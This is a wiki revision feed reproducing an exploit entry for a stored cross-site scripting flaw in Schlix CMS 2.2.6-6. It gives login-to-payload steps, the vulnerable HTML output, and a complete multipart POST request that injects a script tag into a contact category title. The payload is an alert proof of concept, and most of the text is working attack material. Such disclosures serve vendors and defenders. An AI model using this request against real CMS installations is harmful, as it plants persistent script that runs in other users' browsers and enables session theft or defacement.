https://pwnwiki.com/index.php?action=history&feed=atom&title=Schlix_CMS_2.2.6-6_-_%27title%27_XSS%E6%BC%8F%E6%B4%9E Schlix CMS 2.2.6-6 - 'title' XSS漏洞 - Revision history 2026-04-10T02:11:55Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Schlix_CMS_2.2.6-6_-_%27title%27_XSS%E6%BC%8F%E6%B4%9E&diff=2684&oldid=prev Pwnwiki: Created page with "==XSS== <pre> # Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated) # Date: 2021-05-05 # Exploit Author: Emircan Baş # Vendor Homepag..." 2021-05-06T11:53:04Z <p>Created page with &quot;==XSS== &lt;pre&gt; # Exploit Title: Schlix CMS 2.2.6-6 - &#039;title&#039; Persistent Cross-Site Scripting (Authenticated) # Date: 2021-05-05 # Exploit Author: Emircan Baş # Vendor Homepag...&quot;</p> <p><b>New page</b></p><div>==XSS==<br /> &lt;pre&gt;<br /> # Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)<br /> # Date: 2021-05-05<br /> # Exploit Author: Emircan Baş <br /> # Vendor Homepage: https://www.schlix.com/<br /> # Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip<br /> # Version: 2.2.6-6<br /> # Tested on: Windows &amp; WampServer<br /> <br /> ==&gt; Tutorial &lt;==<br /> <br /> 1- Login with your account.<br /> 2- Go to the contacts section. Directory is '/admin/app/contact'.<br /> 3- Create a new category and type an XSS payload into the category title.<br /> 4- XSS payload will be executed when we travel to created page.<br /> <br /> ==&gt; Vulnerable Source Code &lt;==<br /> <br /> &lt;article class=&quot;main category&quot;&gt; <br /> &lt;div class=&quot;media-header-full-width &quot; style=&quot;background-image: url('https://static-demo.schlix.website/images/static/sample1/header/header_img_10.jpg');&quot;&gt;<br /> &lt;div class=&quot;media-header-title container d-flex h-100&quot;&gt;<br /> &lt;div class=&quot;row align-self-center w-100&quot;&gt;<br /> &lt;div class=&quot;col-8 mx-auto&quot;&gt;<br /> &lt;div class=&quot;text-center&quot;&gt;<br /> &lt;h1 class=&quot;item title&quot; itemprop=&quot;headline&quot;&gt;&amp;#039;&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/h1&gt; # OUR PAYLOAD IS NON-EXECUTEABLE<br /> &lt;/div&gt;<br /> &lt;/div&gt;<br /> &lt;/div&gt;<br /> &lt;/div&gt;<br /> &lt;/div&gt;<br /> &lt;div class=&quot;breadcrumb-bg&quot;&gt;<br /> &lt;div class=&quot;container&quot;&gt;<br /> &lt;div class=&quot;breadcrumb-container&quot;&gt;&lt;ol class=&quot;breadcrumb&quot;&gt;&lt;li class=&quot;breadcrumb-item&quot;&gt;&lt;a class=&quot;breadcrumb-home&quot; href=&quot;/cms&quot;&gt;<br /> &lt;i class=&quot;fa fa-home&quot;&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class=&quot;breadcrumb-item&quot;&gt;&lt;a href=&quot;/cms/contacts/&quot;&gt;Contacts&lt;/a&gt;&lt;/li&gt;&lt;li class=&quot;breadcrumb-item&quot;&gt;<br /> &lt;a href=&quot;/cms/contacts/script-alert-2-script/&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ol&gt;&lt;/div&gt;&lt;/div&gt; # EXECUTED PLACE<br /> &lt;/div&gt;<br /> <br /> ==&gt; HTTP Request &lt;==<br /> <br /> POST /admin/app/contacts?action=savecategory HTTP/1.1<br /> Host: (HOST)<br /> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0<br /> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br /> Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br /> Accept-Encoding: gzip, deflate<br /> Content-Type: multipart/form-data; boundary=---------------------------280033592236615772622294478489<br /> Content-Length: 4146<br /> Origin: (ORIGIN)<br /> Connection: close<br /> Referer: (REFERER)<br /> Cookie: contacts_currentCategory=6; scx2f1afdb4b86ade4919555d446d2f0909=gi3u57kmk34s77f1fngigm1k1b; gusrinstall=rt9kps56aasmd8445f7ufr7mva; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2<br /> Upgrade-Insecure-Requests: 1<br /> <br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;_csrftoken&quot;<br /> <br /> 49feefcd2b917b9855cd55c8bd174235fa5912e4<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;cid&quot;<br /> <br /> 6<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;parent_id&quot;<br /> <br /> <br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;guid&quot;<br /> <br /> ee34f23a-7167-a454-8576-20bef7575c15<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;title&quot;<br /> <br /> &lt;script&gt;alert(1)&lt;/script&gt;<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;status&quot;<br /> <br /> 1<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;virtual_filename&quot;<br /> <br /> script-alert-1-script<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;summary&quot;<br /> <br /> <br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;description&quot;<br /> <br /> <br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;meta_description&quot;<br /> <br /> <br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;meta_key&quot;<br /> <br /> <br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;tags&quot;<br /> <br /> <br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;date_available&quot;<br /> <br /> <br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;date_expiry&quot;<br /> <br /> <br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;items_per_page&quot;<br /> <br /> <br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;options[]&quot;<br /> <br /> display_pagetitle<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;options[]&quot;<br /> <br /> __null__<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;options[]&quot;<br /> <br /> display_child_categories<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;options[]&quot;<br /> <br /> __null__<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;options[]&quot;<br /> <br /> display_items<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;options[]&quot;<br /> <br /> __null__<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;options[child_categories_sortby]&quot;<br /> <br /> date_created<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;options[items_sortby]&quot;<br /> <br /> date_created<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;permission_read_everyone&quot;<br /> <br /> everyone<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;permission_read[]&quot;<br /> <br /> 1<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;permission_read[]&quot;<br /> <br /> 2<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;permission_read[]&quot;<br /> <br /> 3<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;permission_write[]&quot;<br /> <br /> 1<br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;cmh_media_selection&quot;<br /> <br /> <br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;cmh_media_upload&quot;; filename=&quot;&quot;<br /> Content-Type: application/octet-stream<br /> <br /> <br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;cmh_media_path&quot;<br /> <br /> <br /> -----------------------------280033592236615772622294478489<br /> Content-Disposition: form-data; name=&quot;cmh_media_url&quot;<br /> <br /> <br /> -----------------------------280033592236615772622294478489--<br /> <br /> &lt;/pre&gt;</div> Pwnwiki